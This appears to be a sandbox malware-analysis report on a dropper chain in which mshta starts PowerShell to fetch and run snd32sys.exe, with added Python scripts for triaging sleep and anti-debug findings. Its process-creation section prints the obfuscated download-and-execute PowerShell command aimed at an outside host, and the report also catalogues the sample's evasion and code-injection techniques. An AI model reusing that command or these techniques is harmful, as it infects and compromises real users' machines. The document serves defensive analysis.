Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 673 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1800 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1157 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5964 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4556 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908 Thread sleep count: 1800 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908 Thread sleep count: 1157 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4884 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2920 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5180 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5276 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404 Thread sleep count: 46 > 30 Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404 Thread sleep time: -2760000s >= -30000s Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404 Thread sleep time: -2700000s >= -30000s Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404 Thread sleep time: -60000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\Public\snd32sys.exe Last function: Thread delayed (2 identical entries)
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0065838E FindFirstFileExW,FindNextFileW,FindClose, 16_2_0065838E
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00657FD2 FindFirstFileExW, 16_2_00657FD2
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_006133E0 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 16_2_006133E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (5 identical entries) Jump to behavior
Source: C:\Users\Public\snd32sys.exe Thread delayed: delay time: 60000 (3 identical entries) Jump to behavior
Source: powershell.exe, 00000002.00000002.349280205.0000000004E27000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.334365492.0000000004E33000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: powershell.exe, 00000002.00000002.349280205.0000000004E27000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp Binary or memory string: j:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: mshta.exe, 00000001.00000003.224307613.0000000002FDB000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
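Added example (not part of the Joe Sandbox report): a small Python triage script over the sleep findings listed above. Every powershell.exe sleep value is an exact multiple of 922337203685477, which is Int64.MaxValue in 100 ns ticks divided by 10,000, i.e. the millisecond value of a .NET Timeout.Infinite wait: 8301034833169293 is 9x, 11990383647911201 is 13x, 1844674407370954 is 2x. Those entries are PowerShell host behaviour, not logic of the sample. The snd32sys.exe entries are the real stall: repeated 60000 ms delays whose cumulative totals 2700000 and 2760000 match the reported sleep counts 45 and 46 (the figures only add up in milliseconds despite the sandbox's 's' suffix; that unit is an assumption of this example). In the same spirit, the 'Hyper-V' strings above come from the PowerShell module directory path (\Modules\Hyper-V), not from the sample. The input is a constructed list of the report's own lines; the line format the regexes expect is the one shown above.

```python
"""Per-process triage of the sandbox's sleep findings (added example)."""
import re
from collections import Counter, defaultdict

# Int64.MaxValue in 100 ns ticks, expressed in milliseconds. A .NET host that
# waits with Timeout.Infinite is reported by the sandbox as this value, or as
# a multiple of it when several such waits are summed for one thread.
INFINITE_WAIT_MS = (2**63 - 1) // 10_000          # 922337203685477

RE_TIME = re.compile(r"Source: (\S+) TID: (\d+) Thread sleep time: -(\d+)s")
RE_COUNT = re.compile(r"Source: (\S+) TID: (\d+) Thread sleep count: (\d+)")
RE_DELAY = re.compile(r"Source: (\S+) Thread delayed: delay time: (\d+)")

# Constructed input: the sleep-related lines of this report, copied verbatim.
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SND = r"C:\Users\Public\snd32sys.exe"
REPORT_LINES = [
    f"Source: {PS} TID: 5964 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior",
    f"Source: {PS} TID: 4556 Thread sleep time: -922337203685477s >= -30000s Jump to behavior",
    f"Source: {PS} TID: 5908 Thread sleep count: 1800 > 30 Jump to behavior",
    f"Source: {PS} TID: 5908 Thread sleep count: 1157 > 30 Jump to behavior",
    f"Source: {PS} TID: 4884 Thread sleep count: 43 > 30 Jump to behavior",
    f"Source: {PS} TID: 2920 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior",
    f"Source: {PS} TID: 5180 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior",
    f"Source: {PS} TID: 5276 Thread sleep time: -922337203685477s >= -30000s Jump to behavior",
    f"Source: {PS} Thread delayed: delay time: 922337203685477 Jump to behavior",
    f"Source: {SND} TID: 4404 Thread sleep count: 46 > 30 Jump to behavior",
    f"Source: {SND} TID: 4404 Thread sleep time: -2760000s >= -30000s Jump to behavior",
    f"Source: {SND} TID: 4404 Thread sleep count: 45 > 30 Jump to behavior",
    f"Source: {SND} TID: 4404 Thread sleep time: -2700000s >= -30000s Jump to behavior",
    f"Source: {SND} TID: 4404 Thread sleep time: -60000s >= -30000s Jump to behavior",
    f"Source: {SND} Thread delayed: delay time: 60000 Jump to behavior",
]


def parse(lines):
    """Group sleep times, sleep counts and per-call delay values by process image."""
    stats = defaultdict(lambda: {"sleep_ms": [], "counts": [], "delays_ms": []})
    for line in lines:
        if m := RE_TIME.search(line):
            stats[m.group(1)]["sleep_ms"].append(int(m.group(3)))
        elif m := RE_COUNT.search(line):
            stats[m.group(1)]["counts"].append(int(m.group(3)))
        elif m := RE_DELAY.search(line):
            stats[m.group(1)]["delays_ms"].append(int(m.group(2)))
    return stats


def classify(proc):
    """Split k x Int64.MaxValue artefacts from real sleeps and size the stall.

    Unit assumption: the report's figures are consistent with milliseconds
    despite the 's' suffix (46 x 60000 = 2760000), so they are treated as ms.
    """
    artefacts = [v // INFINITE_WAIT_MS for v in proc["sleep_ms"] if v % INFINITE_WAIT_MS == 0]
    real = [v for v in proc["sleep_ms"] if v % INFINITE_WAIT_MS != 0]
    real_delays = [d for d in proc["delays_ms"] if d % INFINITE_WAIT_MS != 0]
    per_sleep = Counter(real_delays).most_common(1)[0][0] if real_delays else None
    # Cumulative snapshots of one loop overlap (2700000 then 2760000), so take
    # the longest rather than summing them.
    longest = max(real, default=0)
    result = {"longest_real_ms": longest, "per_sleep_ms": per_sleep,
              "artefact_multiples": artefacts,
              "count_matches": per_sleep is not None and longest // per_sleep in proc["counts"],
              "verdict": "no sleep-based evasion observed"}
    if longest == 0 and artefacts:
        result["verdict"] = (f"only infinite-wait artefacts (k x Int64.MaxValue ticks, k={artefacts}); "
                             "host behaviour, not sample logic")
    elif longest >= 60_000:
        loops = f"{longest // per_sleep} x {per_sleep} ms" if per_sleep else f"{longest} ms"
        result["verdict"] = f"stalling loop: {loops} = {longest / 60_000:.1f} min"
    return result


if __name__ == "__main__":
    for image, proc in parse(REPORT_LINES).items():
        print(image, "->", classify(proc)["verdict"])
```

The practical consequence for this report: the five powershell.exe "sleep time" hits and the 922337203685477 delays can be discounted, and the evasion that matters is snd32sys.exe sleeping 60 s per iteration for 46 iterations before the sandbox gave up, which is also why "Sample execution stops while process was sleeping" fires only for that process.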

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00657943 IsDebuggerPresent, 16_2_00657943
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00613560 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 16_2_00613560
Contains functionality to read the PEB
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0064C285 mov eax, dword ptr fs:[00000030h] 16_2_0064C285
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00659D43 mov eax, dword ptr fs:[00000030h] 16_2_00659D43
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00659DC9 mov eax, dword ptr fs:[00000030h] 16_2_00659DC9
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00659D86 mov eax, dword ptr fs:[00000030h] 16_2_00659D86
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00659E24 mov eax, dword ptr fs:[00000030h] 16_2_00659E24
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00659ED9 mov eax, dword ptr fs:[00000030h] 16_2_00659ED9
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00659F61 mov eax, dword ptr fs:[00000030h] 16_2_00659F61
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00659F1D mov eax, dword ptr fs:[00000030h] 16_2_00659F1D
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00659F92 mov eax, dword ptr fs:[00000030h] 16_2_00659F92
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_006B17C3 mov eax, dword ptr fs:[00000030h] 16_2_006B17C3
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_006B17C3 mov eax, dword ptr fs:[00000030h] 16_2_006B17C3
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_006B138F push dword ptr fs:[00000030h] 16_2_006B138F
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00611390 GetProcessHeap,RtlAllocateHeap, 16_2_00611390
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0062BAF2 SetUnhandledExceptionFilter, 16_2_0062BAF2
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0062B4CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_0062B4CC
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0062B95F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0062B95F
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00636D21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00636D21
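Added example (not from the report or from the sample): a static scanner for the 32-bit PEB/TEB access idioms the sandbox lists above (mov eax, dword ptr fs:[30h] and push dword ptr fs:[30h]). fs:[30h] is TEB.ProcessEnvironmentBlock; what turns such a read into an anti-debugging check is what the code does with the PEB pointer next (PEB+0x02 BeingDebugged, PEB+0x68 NtGlobalFlag), which the scanner recovers with a heuristic look at the following bytes. Two caveats a triager should keep in mind: a lone fs:[30h] read is also routine CRT and loader housekeeping, and the IsProcessorFeaturePresent / IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter sequence at 16_2_0062B95F and 16_2_00636D21 is the shape of the MSVC CRT fast-fail handler, so those two hits are weak evidence on their own. The byte buffer below is constructed for illustration and is not code extracted from snd32sys.exe; the opcode encodings and TEB offsets are standard x86 / Win32.

```python
"""Static scan for 32-bit PEB/TEB access idioms (added example)."""
import re
import struct

# x86 encodings: 0x64 is the FS segment override. A1 = MOV EAX, moffs32.
# 8B /r with ModRM mod=00, rm=101 (0x05, 0x0D, ..., 0x3D) = MOV r32, [disp32].
# FF /6 with ModRM 0x35 = PUSH dword ptr [disp32]. The 4 captured bytes are
# the displacement, i.e. the TEB offset being read.
PATTERNS = {
    "mov eax, dword ptr fs:[disp32]": rb"\x64\xA1(....)",
    "mov r32, dword ptr fs:[disp32]": rb"\x64\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D](....)",
    "push dword ptr fs:[disp32]":     rb"\x64\xFF\x35(....)",
}
TEB_FIELDS = {0x00: "TEB.ExceptionList", 0x18: "TEB.Self", 0x20: "TEB.ClientId.UniqueProcess",
              0x30: "TEB.ProcessEnvironmentBlock", 0x34: "TEB.LastErrorValue"}
# Heuristic follow-ups once the PEB pointer sits in a register: a ModRM byte
# with mod=01 (0x40-0x47 for MOV/TEST/MOVZX, 0x78-0x7F for CMP) followed by a
# disp8 naming PEB.BeingDebugged (+0x02) or PEB.NtGlobalFlag (+0x68).
PEB_FOLLOWUPS = {
    "PEB.BeingDebugged": rb"[\x40-\x47\x78-\x7F]\x02",
    "PEB.NtGlobalFlag":  rb"[\x40-\x47\x78-\x7F]\x68",
}

# Constructed code bytes (not from the sample) exercising each idiom.
SAMPLE = (
    b"\x55\x8B\xEC"                    # push ebp ; mov ebp, esp
    b"\x64\xA1\x30\x00\x00\x00"        # mov eax, dword ptr fs:[30h]      -> PEB
    b"\x0F\xB6\x40\x02"                # movzx eax, byte ptr [eax+2]      -> PEB.BeingDebugged
    b"\x85\xC0\x75\x10"                # test eax, eax ; jne +16
    b"\x64\x8B\x0D\x30\x00\x00\x00"    # mov ecx, dword ptr fs:[30h]
    b"\x8B\x41\x68"                    # mov eax, dword ptr [ecx+68h]     -> PEB.NtGlobalFlag
    b"\x64\xFF\x35\x30\x00\x00\x00"    # push dword ptr fs:[30h]          (cf. 16_2_006B138F)
    b"\x64\xA1\x18\x00\x00\x00"        # mov eax, dword ptr fs:[18h]      -> TEB.Self (benign idiom)
    b"\x5D\xC3"                        # pop ebp ; ret
)


def scan(blob):
    """Return every FS-relative read in blob, sorted by offset, with the TEB
    field it touches and (for PEB reads) the heuristic follow-up access."""
    hits = []
    for insn, pat in PATTERNS.items():
        for m in re.finditer(pat, blob, re.DOTALL):
            teb_off = struct.unpack("<I", m.group(1))[0]
            hit = {"offset": m.start(), "insn": insn, "teb_offset": teb_off,
                   "field": TEB_FIELDS.get(teb_off, "unknown"), "follow_up": None}
            if teb_off == 0x30:
                window = blob[m.end():m.end() + 8]   # next few bytes after the read
                for fname, fpat in PEB_FOLLOWUPS.items():
                    if re.search(fpat, window, re.DOTALL):
                        hit["follow_up"] = fname
                        break
            hits.append(hit)
    return sorted(hits, key=lambda h: h["offset"])


def summarize(hits):
    """Count PEB reads and report which ones look like debugger checks."""
    peb_reads = [h for h in hits if h["teb_offset"] == 0x30]
    checks = [h["follow_up"] for h in peb_reads if h["follow_up"]]
    return {"peb_reads": len(peb_reads), "debug_checks": checks,
            "likely_anti_debug": bool(checks)}


if __name__ == "__main__":
    found = scan(SAMPLE)
    for h in found:
        print(f"+{h['offset']:#06x} {h['insn']:<34} {h['field']:<30} {h['follow_up'] or ''}")
    print(summarize(found))
```

Run over a real unpacked image (the report's "overwrites its own PE header" finding means the on-disk file is not the right input; dump the process after unpacking), the summary separates the handful of reads that go on to test BeingDebugged or NtGlobalFlag from the many that merely fetch the PEB for CRT or loader purposes.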

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject threads in other processes
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00613860 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle, 16_2_00613860
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp Binary or memory string: Progman
Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0062BBFB cpuid 16_2_0062BBFB
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\Public\snd32sys.exe Code function: EnumSystemLocalesW, 16_2_0065C067
Source: C:\Users\Public\snd32sys.exe Code function: EnumSystemLocalesW, 16_2_0065C0D0
Source: C:\Users\Public\snd32sys.exe Code function: EnumSystemLocalesW, 16_2_0065C16B
Source: C:\Users\Public\snd32sys.exe Code function: ___crtGetLocaleInfoEx, 16_2_0062A104
Source: C:\Users\Public\snd32sys.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 16_2_0065C1F6
Source: C:\Users\Public\snd32sys.exe Code function: GetLocaleInfoW, 16_2_0065C449
Source: C:\Users\Public\snd32sys.exe Code function: EnumSystemLocalesW, 16_2_00651499
Source: C:\Users\Public\snd32sys.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 16_2_0065C56F
Source: C:\Users\Public\snd32sys.exe Code function: EnumSystemLocalesW, 16_2_00651599
Source: C:\Users\Public\snd32sys.exe Code function: GetLocaleInfoW, 16_2_0065C675
Source: C:\Users\Public\snd32sys.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 16_2_0065C744
Source: C:\Users\Public\snd32sys.exe Code function: GetLocaleInfoW, 16_2_0062A79B
Source: C:\Users\Public\snd32sys.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 16_2_0065BDC5
Source: C:\Users\Public\snd32sys.exe Code function: GetLocaleInfoW, 16_2_00651EBC
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
